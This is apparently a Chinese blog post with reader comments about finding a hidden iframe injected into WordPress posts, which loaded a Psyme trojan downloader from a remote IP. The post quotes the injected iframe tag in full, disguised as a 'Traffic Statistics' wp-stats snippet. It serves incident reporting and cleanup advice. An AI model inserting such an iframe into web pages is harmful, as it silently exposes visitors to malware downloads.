Wordpress有可能有还未解决的重大漏洞……
米米水和得失跟我说我的网站上有木马Trojan-Downloader.JS.Psyme.cz,开始时不在意,因为有人显示连www.baidu.com/[6]都有马……
然后查了下JS.Psyme,发现它有可能放在一个隐藏的IFrame里混入页面,有点紧张,在我首页的源代码里查找了一下,居然还真的在一篇文章里找到了这段代码:
- <!-- Traffic Statistics -->
- <iframe src=http://61.132.75.71/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe>
- <!-- End Traffic Statistics -->
嵌入的这个页面从文件名看很像是wp-stats插件使用的程序,但实际上完全不是。把它用IE和FIREFOX来看代码是不一样的,很明显会针对IE进行攻击。而61.132.75.71是哪里呢?江苏南京,这个域名的首页只显示一个字符串test,显然不怀好意。
不过这样一来目标就明显多了,搜索后发现有不少人也被注入,比如Xingsu,
接下来在Wordpress官方浩大的问题库里找到这个帖子:iframe injection problem?,在Trac里则有这个:iframe being injected。由于所有人的iframe都是被加在了post里而非theme里,所以应该不会是theme exploit,那么就有可能是包括Wordpress 2.3.1都没有解决的一个漏洞导致了这种注入。具体在哪有漏洞可能只有拥有61.132.75.71这个IP的人才清楚。
眼下的解决方法只有在文章里搜索所有的隐藏IFrame然后删掉,至于更新前会不会再次被注入谁也不知道。反正备份看来是必须做的了。
感谢关心多多居的各位朋友,顺便BS一下我那个过分安静的卡巴6……
没有问题,帮顶~
卡巴6还素不错的~
为什么你的背景音乐是《空之轨迹》主题的原唱=。=
@slience
是有这首,右边的Player里面还可以换歌……
最近也遇到了这种情况,相当奇怪,文章都是自己一个字一个字码上的,可文章最后居然会多出这么个莫名其妙的iframe,要不是感觉开自己的blog老卡还不会去firebug里查到底是什么问题导致的。